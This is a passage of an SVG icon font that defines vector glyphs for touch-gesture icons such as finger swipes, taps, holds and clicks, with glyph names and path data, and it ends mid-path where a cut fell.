<glyph unicode="&#xec20;" glyph-name="three-fingers-swipe-up" d="M608 32.4v289.2l-104-104-24 24 144 144 144-144-24-24-104 104v-289.1c125.1 8.2 224 112.3 224 239.5v191.9c0 26.5-21.3 48.1-48 48.1-26.5 0-48-21.5-48-48.1v-15.9h-32v335.9c0 26.6-21.3 48.1-48 48.1-26.5 0-48-21.3-48-48.1v-303.9h-32v336.3c0 26.3-21.3 47.7-48 47.7-26.5 0-48-21.6-48-47.7v-368.3h-32v335.8c0 26.6-21.3 48.2-48 48.2-26.5 0-48-21.3-48-48.2v-361.4c-65.9 70.4-152.6 147.8-188.1 112.1-34.8-35 54.9-131.4 180-342 53.9-90.6 121.4-154.5 232.1-160.1zM896 272c0-150.2-121.8-272-272-272-99.6 0-204.7 46.5-277.1 178.3-104.4 190.3-238 315-174.4 378.6 45.5 45.5 116.9 1.8 179.5-56.7v0 283.7c0 44.1 35.8 80.1 80 80.1 20.4 0 39-7.6 53-20 11.4 30.4 40.6 52 75 52 34.6 0 63.7-21.7 75-52.1 14.1 12.5 32.7 20.1 53 20.1 44.5 0 80-35.9 80-80.1v-256.4c13.4 10.1 30 16 48 16 44.5 0 80-35.8 80-80v-191.5z" />
<glyph unicode="&#xec21;" glyph-name="three-fingers-swipe-up2" d="M640 321.6v-289.3c126.8 6.4 223.7 111.3 223.7 239.7v255.8c0 26.6-21.3 48.2-48 48.2-26.5 0-48-21.6-48-48.2v-79.8h-32v304.3c0 26.4-21.3 47.7-48 47.7-26.5 0-48-21.2-48-47.7v-272.3h-32v336.3c0 26.3-21.3 47.7-48 47.7-26.5 0-48-21.6-48-47.7v-368.3h-32v303.7c0 26.7-21.3 48.3-48 48.3-26.5 0-48-21.3-48-48.3v-329.3c-65.9 70.4-152.6 147.8-188.1 112.1-34.8-35 54.9-131.4 180-342 53.3-89.6 123.9-153.1 232.4-159.9v0 289l-104-104-24 24 144 144 144-144-24-24-104 104z" />
<glyph unicode="&#xec22;" glyph-name="three-fingers-swipe-down" d="M608 480v336.291c0 26.349-21.306 47.709-48 47.709-26.51 0-48-21.639-48-47.709v-368.291h-32v335.832c0 26.602-21.306 48.168-48 48.168-26.51 0-48-21.348-48-48.168v-361.379c-65.869 70.413-152.588 147.815-188.127 112.084-34.789-34.977 54.859-131.36 180.043-341.996 56.404-94.905 127.773-160.526 248.084-160.541 132.548 0 240 107.452 240 240v191.946c0 26.539-21.306 48.054-48 48.054-26.51 0-48-21.478-48-48.054v-15.946h-32v335.896c0 26.567-21.306 48.104-48 48.104-26.51 0-48-21.294-48-48.104v-593.496l104 104 24-24-144-144-144 144 24 24 104-104v289.6zM896 272c0-150.221-121.779-272-272-272-99.613 0-204.742 46.48-277.094 178.297-104.432 190.263-237.983 315.040-174.391 378.633 45.493 45.493 116.919 1.849 179.484-56.667v0 283.647c0 44.059 35.817 80.090 80 80.090 20.43 0 38.966-7.561 53.040-20.022 11.352 30.432 40.631 52.022 74.96 52.022 34.57 0 63.718-21.655 74.998-52.068 14.113 12.496 32.672 20.068 53.002 20.068 44.491 0 80-35.867 80-80.111v-256.354c13.371 10.052 29.99 16.010 48 16.010 44.491 0 80-35.819 80-80.004v-191.542z" />
<glyph unicode="&#xec23;" glyph-name="three-fingers-swipe-down2" d="M607.7 190.4v625.9c0 26.3-21.3 47.7-48 47.7-26.5 0-48-21.6-48-47.7v-368.3h-32v303.7c0 26.7-21.3 48.3-48 48.3-26.5 0-48-21.3-48-48.3v-329.3c-65.9 70.4-152.6 147.8-188.1 112.1-34.8-35 54.9-131.4 180-342 56.4-94.9 127.8-160.5 248.1-160.5 132.5 0 240 107.5 240 240v255.8c0 26.6-21.3 48.2-48 48.2-26.5 0-48-21.6-48-48.2v-79.8h-32v304.3c0 26.4-21.3 47.7-48 47.7-26.5 0-48-21.2-48-47.7v-561.9l104 104 24-24-144-144-144 144 24 24 104-104z" />
<glyph unicode="&#xec24;" glyph-name="three-fingers" d="M624 32v0c132.548 0 240 107.452 240 240v191.946c0 26.539-21.306 48.054-48 48.054-26.51 0-48-21.478-48-48.054v-15.946h-32v335.896c0 26.567-21.306 48.104-48 48.104-26.51 0-48-21.294-48-48.104v-303.896h-32v336.291c0 26.349-21.306 47.709-48 47.709-26.51 0-48-21.639-48-47.709v-368.291h-32v335.832c0 26.602-21.306 48.168-48 48.168-26.51 0-48-21.348-48-48.168v-361.379c-65.869 70.413-152.588 147.815-188.127 112.084-34.789-34.977 54.859-131.36 180.043-341.996 56.404-94.905 127.773-160.526 248.084-160.541zM896 272c0-150.221-121.779-272-272-272-99.613 0-204.742 46.48-277.094 178.297-104.432 190.263-237.983 315.040-174.391 378.633 45.493 45.493 116.919 1.849 179.484-56.667v0 283.647c0 44.059 35.817 80.090 80 80.090 20.43 0 38.966-7.561 53.040-20.022 11.352 30.432 40.631 52.022 74.96 52.022 34.57 0 63.718-21.655 74.998-52.068 14.113 12.496 32.672 20.068 53.002 20.068 44.491 0 80-35.867 80-80.111v-256.354c13.371 10.052 29.99 16.010 48 16.010 44.491 0 80-35.819 80-80.004v-191.542z" />
<glyph unicode="&#xec25;" glyph-name="three-fingers2" d="M607.7 816.3c0 26.3-21.3 47.7-48 47.7-26.5 0-48-21.6-48-47.7v-368.3h-32v303.7c0 26.7-21.3 48.3-48 48.3-26.5 0-48-21.3-48-48.3v-329.3c-65.9 70.4-152.6 147.8-188.1 112.1-34.8-35 54.9-131.4 180-342 56.4-94.9 127.8-160.5 248.1-160.5 132.5 0 240 107.5 240 240v255.8c0 26.6-21.3 48.2-48 48.2-26.5 0-48-21.6-48-48.2v-79.8h-32v304.3c0 26.4-21.3 47.7-48 47.7-26.5 0-48-21.2-48-47.7v-272.3h-32v336.3z" />
<glyph unicode="&#xec26;" glyph-name="three-fingers-double-tap3" d="M613.966 823.845c12.979 5.259 27.168 8.155 42.034 8.155 61.856 0 112-50.144 112-112 0-5.394-0.381-10.699-1.118-15.89v0c0.737-5.172 1.118-10.457 1.118-15.832v-58.796c20.013 24.732 32 56.225 32 90.517 0 79.529-64.471 144-144 144-11.349 0-22.391-1.313-32.983-3.795-25.356 22.283-58.608 35.795-95.017 35.795s-69.661-13.512-95.017-35.795c-10.592 2.482-21.634 3.795-32.983 3.795-79.529 0-144-64.471-144-144 0-34.293 11.987-65.786 32-90.517v90.305c0 31.031 12.565 59.113 32.873 79.422l-0.069-0.015c20.268 20.268 48.268 32.804 79.196 32.804 14.848 0 29.021-2.889 41.988-8.136 20.545 24.539 51.45 40.136 86.012 40.136 34.489 0 65.4-15.614 85.966-40.155v0 0zM768 584.229c39.088 32.281 64 81.117 64 135.771 0 97.202-78.798 176-176 176-8.291 0-16.448-0.573-24.433-1.682-29.059 21.183-64.853 33.682-103.567 33.682s-74.507-12.499-103.567-33.682c-7.986 1.109-16.143 1.682-24.433 1.682-97.202 0-176-78.798-176-176 0-54.654 24.912-103.489 64-135.771v0-39.531c-57.733 36.962-96 101.663-96 175.302 0 114.875 93.125 208 208 208 5.427 0 10.806-0.208 16.128-0.616 32.303 20.648 70.69 32.616 111.872 32.616s79.569-11.968 111.872-32.616v0c5.323 0.408 10.701 0.616 16.128 0.616 114.875 0 208-93.125 208-208 0-73.639-38.267-138.34-96-175.302v39.531zM592-32v0c132.548 0 240 107.452 240 240v191.946c0 26.539-21.306 48.054-48 48.054-26.51 0-48-21.478-48-48.054v-15.946h-32v335.896c0 26.567-21.306 48.104-48 48.104-26.51 0-48-21.294-48-48.104v-303.896h-32v336.291c0 26.349-21.306 47.709-48 47.709-26.51 0-48-21.639-48-47.709v-368.291h-32v335.832c0 26.602-21.306 48.168-48 48.168-26.51 0-48-21.348-48-48.168v-361.379c-65.869 70.413-152.588 147.815-188.127 112.084-34.789-34.977 54.859-131.36 180.043-341.996 56.404-94.905 127.773-160.526 248.084-160.541zM864 208c0-150.221-121.779-272-272-272-99.613 0-204.742 46.48-277.094 178.297-104.432 190.263-237.983 315.040-174.391 378.633 45.493 45.493 116.919 1.849 179.484-56.667v0 283.647c0 44.059 35.817 80.090 80 80.090 20.43 0 38.966-7.561 53.040-20.022 11.352 30.432 40.631 52.022 74.96 52.022 34.57 0 63.718-21.655 74.998-52.068 14.113 12.496 32.672 20.068 53.002 20.068 44.491 0 80-35.867 80-80.111v-256.354c13.371 10.052 29.99 16.010 48 16.010 44.491 0 80-35.819 80-80.004v-191.542z" />
<glyph unicode="&#xec27;" glyph-name="three-fingers-double-tap4" d="M767.7 609.6c19.8 20.2 32 47.9 32 78.4 0 61.9-50.1 112-112 112-8.8 0-17.3-1-25.4-2.9v0c-17.4 39.4-56.8 66.9-102.6 66.9s-85.2-27.5-102.6-66.9c-8.2 1.9-16.7 2.9-25.4 2.9-61.9 0-112-50.1-112-112 0-30.5 12.2-58.2 32-78.4v0 78.4c0 43.9 35.8 80 80 80 18.1 0 34.7-5.9 48-15.9v0.2c0 43.6 35.8 79.7 80 79.7 44.5 0 80-35.7 80-79.7v-0.3c13.4 10.1 30 16.1 48 16.1 44.5 0 80-35.7 80-79.7v-78.8zM767.7 568.2c38.6 25.8 64 69.8 64 119.8 0 79.5-64.5 144-144 144-2.7 0-5.4-0.1-8.1-0.2v0c-25.8 38.7-69.9 64.2-119.9 64.2s-94.1-25.5-119.9-64.2c-2.7 0.1-5.4 0.2-8.1 0.2-79.5 0-144-64.5-144-144 0-49.9 25.4-93.9 64-119.8v0-37.1c-57 29.1-96 88.4-96 156.8 0 94.6 74.6 171.7 168.1 175.8 32.3 39.3 81.2 64.3 135.9 64.3s103.6-25 135.9-64.2c93.5-4.1 168.1-81.3 168.1-175.8 0-68.4-39-127.7-96-156.8v37zM607.7 752.3c0 26.3-21.3 47.7-48 47.7-26.5 0-48-21.6-48-47.7v-368.3h-32v303.7c0 26.7-21.3 48.3-48 48.3-26.5 0-48-21.3-48-48.3v-329.3c-65.9 70.4-152.6 147.8-188.1 112.1-34.8-35 54.9-131.4 180-342 56.4-94.9 127.8-160.5 248.1-160.5 132.5 0 240 107.5 240 240v255.8c0 26.6-21.3 48.2-48 48.2-26.5 0-48-21.6-48-48.2v-79.8h-32v304.3c0 26.4-21.3 47.7-48 47.7-26.5 0-48-21.2-48-47.7v-272.3h-32v336.3z" />
<glyph unicode="&#xec28;" glyph-name="two-fingers-swipe-up3" d="M320 543.122v194.478l-104-104-24 24 144 144 144-144-24-24-104 104v-194.481c71.874-7.965 128-68.941 128-142.982v-432.137h-288v432.137c0 74.062 56.001 135.035 128 142.985zM672 639.122v194.478l-104-104-24 24 144 144 144-144-24-24-104 104v-194.483c71.874-7.981 128-69.084 128-143.278v-527.839h-288v527.839c0 74.305 56.001 135.327 128 143.282zM336 512c-61.856 0-112-50.025-112-111.728v-400.272h224v400.272c0 61.706-50.27 111.728-112 111.728v0zM336 480v0c44.491 0 80-35.957 80-80.313v-111.687h-160v111.687c0 44.199 35.817 80.313 80 80.313zM336 448c-26.51 0-48-21.713-48-48.027v-79.973h96v79.973c0 26.524-21.306 48.027-48 48.027v0zM256 192v-32h160v32h-160zM256 128v-32h160v32h-160zM688 608c-61.856 0-112-50.272-112-112.225v-495.775h224v495.775c0 61.98-50.27 112.225-112 112.225v0zM688 576v0c44.491 0 80-35.957 80-80.313v-111.687h-160v111.687c0 44.199 35.817 80.313 80 80.313zM688 544c-26.51 0-48-21.713-48-48.027v-79.973h96v79.973c0 26.524-21.306 48.027-48 48.027v0zM608 288v-32h160v32h-160zM608 224v-32h160v32h-160z" />
<glyph unicode="&#xec29;" glyph-name="two-fingers-swipe-up4" d="M672 637.522v194.478l-104-104-24 24 144 144 144-144-24-24-104 104v-194.483c71.874-7.981 128-69.084 128-143.278v-527.839h-288v527.839c0 74.305 56.001 135.327 128 143.282zM320 541.522v194.478l-104-104-24 24 144 144 144-144-24-24-104 104v-194.481c71.874-7.965 128-68.941 128-142.982v-432.137h-288v432.137c0 74.062 56.001 135.035 128 142.985zM336 478.4c-44.183 0-80-36.114-80-80.313v-111.687h160v111.687c0 44.356-35.509 80.313-80 80.313v0zM256 190.4v-32h160v32h-160zM256 126.4v-32h160v32h-160zM688 574.4c-44.183 0-80-36.114-80-80.313v-111.687h160v111.687c0 44.356-35.509 80.313-80 80.313v0zM608 286.4v-32h160v32h-160zM608 222.4v-32h160v32h-160z" />
<glyph unicode="&#xec2a;" glyph-name="one-finger-double-tap3" d="M704 232.104c77.96 61.531 128 156.87 128 263.896 0 185.568-150.432 336-336 336s-336-150.432-336-336c0-107.026 50.040-202.365 128-263.896v42.193c-59.089 55.459-96 134.271-96 221.704 0 167.895 136.105 304 304 304s304-136.105 304-304c0-87.433-36.911-166.245-96-221.704v-42.193zM704 376.186c20.354 35.259 32 76.176 32 119.814 0 132.548-107.452 240-240 240s-240-107.452-240-240c0-43.638 11.646-84.555 32-119.814v119.923c0 114.768 93.125 207.891 208 207.891 114.641 0 208-93.076 208-207.891v-119.923zM496 640v0c79.367 0 144-64.543 144-144.161v-527.839h-288v527.839c0 79.727 64.471 144.161 144 144.161zM496 608c-61.856 0-112-50.272-112-112.225v-495.775h224v495.775c0 61.98-50.27 112.225-112 112.225v0zM496 576v0c44.491 0 80-35.957 80-80.313v-111.687h-160v111.687c0 44.199 35.817 80.313 80 80.313zM496 544c-26.51 0-48-21.713-48-48.027v-79.973h96v79.973c0 26.524-21.306 48.027-48 48.027v0zM416 288v-32h160v32h-160zM416 224v-32h160v32h-160z" />
<glyph unicode="&#xec2b;" glyph-name="one-finger-double-tap4" d="M496 640v0c79.367 0 144-64.543 144-144.161v-527.839h-288v527.839c0 79.727 64.471 144.161 144 144.161zM496 576c-44.183 0-80-36.114-80-80.313v-111.687h160v111.687c0 44.356-35.509 80.313-80 80.313v0zM416 288v-32h160v32h-160zM416 224v-32h160v32h-160zM704 232.104c77.96 61.531 128 156.87 128 263.896 0 185.568-150.432 336-336 336s-336-150.432-336-336c0-107.026 50.040-202.365 128-263.896v42.193c-59.089 55.459-96 134.271-96 221.704 0 167.895 136.105 304 304 304s304-136.105 304-304c0-87.433-36.911-166.245-96-221.704v-42.193zM704 376.186c20.354 35.259 32 76.176 32 119.814 0 132.548-107.452 240-240 240s-240-107.452-240-240c0-43.638 11.646-84.555 32-119.814v119.923c0 114.768 93.125 207.891 208 207.891 114.641 0 208-93.076 208-207.891v-119.923z" />
<glyph unicode="&#xec2c;" glyph-name="two-fingers-swipe-down3" d="M320 224h-128v432.137c0 79.465 64.471 143.863 144 143.863 79.367 0 144-64.41 144-143.863v-432.137h-128v-193.6l104 104 24-24-144-144-144 144 24 24 104-104v193.6zM672 224h-128v527.839c0 79.727 64.471 144.161 144 144.161 79.367 0 144-64.543 144-144.161v-527.839h-128v-193.6l104 104 24-24-144-144-144 144 24 24 104-104v193.6zM336 768c-61.856 0-112-50.025-112-111.728v-400.272h224v400.272c0 61.706-50.27 111.728-112 111.728v0zM336 736v0c44.491 0 80-35.957 80-80.313v-111.687h-160v111.687c0 44.199 35.817 80.313 80 80.313zM336 704c-26.51 0-48-21.713-48-48.027v-79.973h96v79.973c0 26.524-21.306 48.027-48 48.027v0zM256 448v-32h160v32h-160zM256 384v-32h160v32h-160zM688 864c-61.856 0-112-50.272-112-112.225v-495.775h224v495.775c0 61.98-50.27 112.225-112 112.225v0zM688 832v0c44.491 0 80-35.957 80-80.313v-111.687h-160v111.687c0 44.199 35.817 80.313 80 80.313zM688 800c-26.51 0-48-21.713-48-48.027v-79.973h96v79.973c0 26.524-21.306 48.027-48 48.027v0zM608 544v-32h160v32h-160zM608 480v-32h160v32h-160z" />
<glyph unicode="&#xec2d;" glyph-name="two-fingers-swipe-down4" d="M320 192h-128v432.137c0 79.465 64.471 143.863 144 143.863 79.367 0 144-64.41 144-143.863v-432.137h-128v-161.6l104 104 24-24-144-144-144 144 24 24 104-104v161.6zM672 192h-128v527.839c0 79.727 64.471 144.161 144 144.161 79.367 0 144-64.543 144-144.161v-527.839h-128v-161.6l104 104 24-24-144-144-144 144 24 24 104-104v161.6zM336 704c-44.183 0-80-36.114-80-80.313v-111.687h160v111.687c0 44.356-35.509 80.313-80 80.313v0zM256 416v-32h160v32h-160zM256 352v-32h160v32h-160zM688 800c-44.183 0-80-36.114-80-80.313v-111.687h160v111.687c0 44.356-35.509 80.313-80 80.313v0zM608 512v-32h160v32h-160zM608 448v-32h160v32h-160z" />
<glyph unicode="&#xec2e;" glyph-name="two-fingers-swipe-right3" d="M704 384v-416h-288v527.839c0 79.727 64.471 144.161 144 144.161 79.367 0 144-64.543 144-144.161v-79.839h193.6l-104 104 24 24 144-144-144-144-24 24 104 104h-193.6zM208 544v0c79.367 0 144-64.41 144-143.863v-432.137h-288v432.137c0 79.465 64.471 143.863 144 143.863zM208 512c-61.856 0-112-50.025-112-111.728v-400.272h224v400.272c0 61.706-50.27 111.728-112 111.728v0zM208 480v0c44.491 0 80-35.957 80-80.313v-111.687h-160v111.687c0 44.199 35.817 80.313 80 80.313zM208 448c-26.51 0-48-21.713-48-48.027v-79.973h96v79.973c0 26.524-21.306 48.027-48 48.027v0zM128 192v-32h160v32h-160zM128 128v-32h160v32h-160zM560 608c-61.856 0-112-50.272-112-112.225v-495.775h224v495.775c0 61.98-50.27 112.225-112 112.225v0zM560 576v0c44.491 0 80-35.957 80-80.313v-111.687h-160v111.687c0 44.199 35.817 80.313 80 80.313zM560 544c-26.51 0-48-21.713-48-48.027v-79.973h96v79.973c0 26.524-21.306 48.027-48 48.027v0zM480 288v-32h160v32h-160zM480 224v-32h160v32h-160z" />
<glyph unicode="&#xec2f;" glyph-name="two-fingers-swipe-right4" d="M704 384v-416h-288v527.839c0 79.727 64.471 144.161 144 144.161 79.367 0 144-64.543 144-144.161v-79.839h193.6l-104 104 24 24 144-144-144-144-24 24 104 104h-193.6zM208 544v0c79.367 0 144-64.41 144-143.863v-432.137h-288v432.137c0 79.465 64.471 143.863 144 143.863zM208 480c-44.183 0-80-36.114-80-80.313v-111.687h160v111.687c0 44.356-35.509 80.313-80 80.313v0zM128 192v-32h160v32h-160zM128 128v-32h160v32h-160zM560 576c-44.183 0-80-36.114-80-80.313v-111.687h160v111.687c0 44.356-35.509 80.313-80 80.313v0zM480 288v-32h160v32h-160zM480 224v-32h160v32h-160z" />
<glyph unicode="&#xec30;" glyph-name="two-fingers-swipe-left3" d="M320.865 416c7.903 71.999 68.971 128 143.135 128 79.367 0 144-64.41 144-143.863v-432.137h-288v416h-193.6l104-104-24-24-144 144 144 144 24-24-104-104h194.465zM464 512c-61.856 0-112-50.025-112-111.728v-400.272h224v400.272c0 61.706-50.27 111.728-112 111.728v0zM464 480v0c44.491 0 80-35.957 80-80.313v-111.687h-160v111.687c0 44.199 35.817 80.313 80 80.313zM464 448c-26.51 0-48-21.713-48-48.027v-79.973h96v79.973c0 26.524-21.306 48.027-48 48.027v0zM384 192v-32h160v32h-160zM384 128v-32h160v32h-160zM816 640v0c79.367 0 144-64.543 144-144.161v-527.839h-288v527.839c0 79.727 64.471 144.161 144 144.161zM816 608c-61.856 0-112-50.272-112-112.225v-495.775h224v495.775c0 61.98-50.27 112.225-112 112.225v0zM816 576v0c44.491 0 80-35.957 80-80.313v-111.687h-160v111.687c0 44.199 35.817 80.313 80 80.313zM816 544c-26.51 0-48-21.713-48-48.027v-79.973h96v79.973c0 26.524-21.306 48.027-48 48.027v0zM736 288v-32h160v32h-160zM736 224v-32h160v32h-160z" />
<glyph unicode="&#xec31;" glyph-name="two-fingers-swipe-left4" d="M322.465 416c7.903 71.999 68.971 128 143.135 128 79.367 0 144-64.41 144-143.863v-432.137h-288v416h-193.6l104-104-24-24-144 144 144 144 24-24-104-104h194.465zM465.6 480c-44.183 0-80-36.114-80-80.313v-111.687h160v111.687c0 44.356-35.509 80.313-80 80.313v0zM385.6 192v-32h160v32h-160zM385.6 128v-32h160v32h-160zM817.6 640v0c79.367 0 144-64.543 144-144.161v-527.839h-288v527.839c0 79.727 64.471 144.161 144 144.161zM817.6 576c-44.183 0-80-36.114-80-80.313v-111.687h160v111.687c0 44.356-35.509 80.313-80 80.313v0zM737.6 288v-32h160v32h-160zM737.6 224v-32h160v32h-160z" />
<glyph unicode="&#xec32;" glyph-name="one-finger-tap3" d="M672 288.609c58.733 49.892 96 124.29 96 207.391 0 150.221-121.779 272-272 272s-272-121.779-272-272c0-83.101 37.267-157.499 96-207.391v44.221c-39.718 42.82-64 100.16-64 163.17 0 132.548 107.452 240 240 240s240-107.452 240-240c0-63.011-24.282-120.35-64-163.17v-44.221zM496 640v0c79.367 0 144-64.543 144-144.161v-527.839h-288v527.839c0 79.727 64.471 144.161 144 144.161zM496 608c-61.856 0-112-50.272-112-112.225v-495.775h224v495.775c0 61.98-50.27 112.225-112 112.225v0zM496 576v0c44.491 0 80-35.957 80-80.313v-111.687h-160v111.687c0 44.199 35.817 80.313 80 80.313zM496 544c-26.51 0-48-21.713-48-48.027v-79.973h96v79.973c0 26.524-21.306 48.027-48 48.027v0zM416 288v-32h160v32h-160zM416 224v-32h160v32h-160z" />
<glyph unicode="&#xec33;" glyph-name="one-finger-tap4" d="M496 640v0c79.367 0 144-64.543 144-144.161v-527.839h-288v527.839c0 79.727 64.471 144.161 144 144.161zM496 576c-44.183 0-80-36.114-80-80.313v-111.687h160v111.687c0 44.356-35.509 80.313-80 80.313v0zM416 288v-32h160v32h-160zM416 224v-32h160v32h-160zM672 288.609c58.733 49.892 96 124.29 96 207.391 0 150.221-121.779 272-272 272s-272-121.779-272-272c0-83.101 37.267-157.499 96-207.391v44.221c-39.718 42.82-64 100.16-64 163.17 0 132.548 107.452 240 240 240s240-107.452 240-240c0-63.011-24.282-120.35-64-163.17v-44.221z" />
<glyph unicode="&#xec34;" glyph-name="one-finger-tap-hold3" d="M800 768h64v32h-64v94.866c54.277-7.764 96-54.442 96-110.866 0-61.856-50.144-112-112-112s-112 50.144-112 112c0 56.424 41.723 103.102 96 110.866v-126.866h32zM368 640v0c79.367 0 144-64.543 144-144.161v-527.839h-288v527.839c0 79.727 64.471 144.161 144 144.161zM368 608c-61.856 0-112-50.272-112-112.225v-495.775h224v495.775c0 61.98-50.27 112.225-112 112.225v0zM368 576v0c44.491 0 80-35.957 80-80.313v-111.687h-160v111.687c0 44.199 35.817 80.313 80 80.313zM368 544c-26.51 0-48-21.713-48-48.027v-79.973h96v79.973c0 26.524-21.306 48.027-48 48.027v0zM288 288v-32h160v32h-160zM288 224v-32h160v32h-160zM784 640c79.529 0 144 64.471 144 144s-64.471 144-144 144c-79.529 0-144-64.471-144-144s64.471-144 144-144v0zM544 288.609c58.733 49.892 96 124.29 96 207.391 0 150.221-121.779 272-272 272s-272-121.779-272-272c0-83.101 37.267-157.499 96-207.391v44.221c-39.718 42.82-64 100.16-64 163.17 0 132.548 107.452 240 240 240s240-107.452 240-240c0-63.011-24.282-120.35-64-163.17v-44.221z" />
<glyph unicode="&#xec35;" glyph-name="one-finger-tap-hold4" d="M800 894.866c54.277-7.764 96-54.442 96-110.866 0-61.856-50.144-112-112-112s-112 50.144-112 112c0 56.424 41.723 103.102 96 110.866v-126.866h32v126.866zM368 640v0c79.367 0 144-64.543 144-144.161v-527.839h-288v527.839c0 79.727 64.471 144.161 144 144.161zM368 576c-44.183 0-80-36.114-80-80.313v-111.687h160v111.687c0 44.356-35.509 80.313-80 80.313v0zM288 288v-32h160v32h-160zM288 224v-32h160v32h-160zM784 640c79.529 0 144 64.471 144 144s-64.471 144-144 144c-79.529 0-144-64.471-144-144s64.471-144 144-144v0zM800 800v-32h64v32h-64zM544 288.609c58.733 49.892 96 124.29 96 207.391 0 150.221-121.779 272-272 272s-272-121.779-272-272c0-83.101 37.267-157.499 96-207.391v44.221c-39.718 42.82-64 100.16-64 163.17 0 132.548 107.452 240 240 240s240-107.452 240-240c0-63.011-24.282-120.35-64-163.17v-44.221z" />
<glyph unicode="&#xec36;" glyph-name="one-finger-click3" d="M528 640v0c79.367 0 144-64.543 144-144.161v-527.839h-288v527.839c0 79.727 64.471 144.161 144 144.161zM528 608c-61.856 0-112-50.272-112-112.225v-495.775h224v495.775c0 61.98-50.27 112.225-112 112.225v0zM528 576v0c44.491 0 80-35.957 80-80.313v-111.687h-160v111.687c0 44.199 35.817 80.313 80 80.313zM528 544c-26.51 0-48-21.713-48-48.027v-79.973h96v79.973c0 26.524-21.306 48.027-48 48.027v0zM448 288v-32h160v32h-160zM448 224v-32h160v32h-160zM512 864v-160h32v160h-32zM799.347 758.232l-113.137-113.137 22.627-22.627 113.137 113.137-22.627 22.627zM927.742 480.258h-160v-32h160v32zM128.258 448.258h160v32h-160v-32zM234.026 735.605l113.137-113.137 22.627 22.627-113.137 113.137-22.627-22.627z" />
<glyph unicode="&#xec37;" glyph-name="one-finger-click4" d="M528 640v0c79.367 0 144-64.543 144-144.161v-527.839h-288v527.839c0 79.727 64.471 144.161 144 144.161zM528 576c-44.183 0-80-36.114-80-80.313v-111.687h160v111.687c0 44.356-35.509 80.313-80 80.313v0zM448 288v-32h160v32h-160zM448 224v-32h160v32h-160zM512 864v-160h32v160h-32zM799.347 758.232l-113.137-113.137 22.627-22.627 113.137 113.137-22.627 22.627zM927.742 480.258h-160v-32h160v32zM128.258 448.258h160v32h-160v-32zM234.026 735.605l113.137-113.137 22.627 22.627-113.137 113.137-22.627-22.627z" />
<glyph unicode="&#xec38;" glyph-name="one-finger-swipe-horizontally" d="M671.103 512h194.497l-104 104 24 24 144-144-144-144-24 24 104 104h-193.6v-512h-288v512h-193.6l104-104-24-24-144 144 144 144 24-24-104-104h194.493c8.015 72.095 69.029 128 143.107 128 73.921 0 135.061-55.989 143.103-128zM528 608c-61.856 0-112-50.272-112-112.225v-495.775h224v495.775c0 61.98-50.27 112.225-112 112.225v0zM528 576v0c44.491 0 80-35.957 80-80.313v-111.687h-160v111.687c0 44.199 35.817 80.313 80 80.313zM528 544c-26.51 0-48-21.713-48-48.027v-79.973h96v79.973c0 26.524-21.306 48.027-48 48.027v0zM448 288v-32h160v32h-160zM448 224v-32h160v32h-160z" />
<glyph unicode="&#xec39;" glyph-name="one-finger-swipe-horizontally2" d="M671.103 512h194.497l-104 104 24 24 144-144-144-144-24 24 104 104h-193.6v-512h-288v512h-193.6l104-104-24-24-144 144 144 144 24-24-104-104h194.493c8.015 72.095 69.029 128 143.107 128 73.921 0 135.061-55.989 143.103-128zM528 576c-44.183 0-80-36.114-80-80.313v-111.687h160v111.687c0 44.356-35.509 80.313-80 80.313v0zM448 288v-32h160v32h-160zM448 224v-32h160v32h-160z" />
<glyph unicode="&#xec3a;" glyph-name="one-finger-swipe" d="M671.103 512h194.497l-104 104 24 24 144-144-144-144-24 24 104 104h-193.6v-512h-288v512h-193.6l104-104-24-24-144 144 144 144 24-24-104-104h194.493c7.43 66.832 60.403 119.751 127.107 127.122v194.478l-104-104-24 24 144 144 144-144-24-24-104 104v-194.483c66.581-7.393 119.649-60.373 127.103-127.117v0 0zM528 608c-61.856 0-112-50.272-112-112.225v-495.775h224v495.775c0 61.98-50.27 112.225-112 112.225v0zM528 576v0c44.491 0 80-35.957 80-80.313v-111.687h-160v111.687c0 44.199 35.817 80.313 80 80.313zM528 544c-26.51 0-48-21.713-48-48.027v-79.973h96v79.973c0 26.524-21.306 48.027-48 48.027v0zM448 288v-32h160v32h-160zM448 224v-32h160v32h-160z" />
<glyph unicode="&#xec3b;" glyph-name="one-finger-swipe2" d="M384.893 512c7.43 66.832 60.403 119.751 127.107 127.122v0 194.478l-104-104-24 24 144 144 144-144-24-24-104 104v-194.483c66.581-7.393 119.649-60.373 127.103-127.117h194.497l-104 104 24 24 144-144-144-144-24 24 104 104h-193.6v-512h-288v512h-193.6l104-104-24-24-144 144 144 144 24-24-104-104h194.493zM528 576c-44.183 0-80-36.114-80-80.313v-111.687h160v111.687c0 44.356-35.509 80.313-80 80.313v0zM448 288v-32h160v32h-160zM448 224v-32h160v32h-160z" />
<glyph unicode="&#xec3c;" glyph-name="two-fingers-double-tap" d="M336 544v0c79.367 0 144-64.41 144-143.863v-432.137h-288v432.137c0 79.465 64.471 143.863 144 143.863zM336 512c-61.856 0-112-50.025-112-111.728v-400.272h224v400.272c0 61.706-50.27 111.728-112 111.728v0zM336 480v0c44.491 0 80-35.957 80-80.313v-111.687h-160v111.687c0 44.199 35.817 80.313 80 80.313zM336 448c-26.51 0-48-21.713-48-48.027v-79.973h96v79.973c0 26.524-21.306 48.027-48 48.027v0zM256 192v-32h160v32h-160zM256 128v-32h160v32h-160zM688 640v0c79.367 0 144-64.543 144-144.161v-527.839h-288v527.839c0 79.727 64.471 144.161 144 144.161zM688 608c-61.856 0-112-50.272-112-112.225v-495.775h224v495.775c0 61.98-50.27 112.225-112 112.225v0zM688 576v0c44.491 0 80-35.957 80-80.313v-111.687h-160v111.687c0 44.199 35.817 80.313 80 80.313zM688 544c-26.51 0-48-21.713-48-48.027v-79.973h96v79.973c0 26.524-21.306 48.027-48 48.027v0zM608 288v-32h160v32h-160zM608 224v-32h160v32h-160zM896 376.186c20.354 35.259 32 76.176 32 119.814 0 132.548-107.452 240-240 240-95.877 0-178.623-56.22-217.070-137.493-38.45 26.186-84.902 41.493-134.93 41.493-132.548 0-240-107.452-240-240 0-43.638 11.646-84.555 32-119.814v119.923c0 114.768 93.125 207.891 208 207.891 58.68 0 111.784-24.386 149.646-63.591 21.792 91.495 104.121 159.591 202.354 159.591 114.641 0 208-93.076 208-207.891v-119.923zM896 274.296c59.089 55.459 96 134.271 96 221.704 0 167.895-136.105 304-304 304-97.522 0-184.318-45.92-239.946-117.318-34.675 13.757-72.481 21.318-112.054 21.318-167.895 0-304-136.105-304-304 0-87.433 36.911-166.245 96-221.704v-42.193c-77.96 61.531-128 156.87-128 263.896 0 185.568 150.432 336 336 336 35.495 0 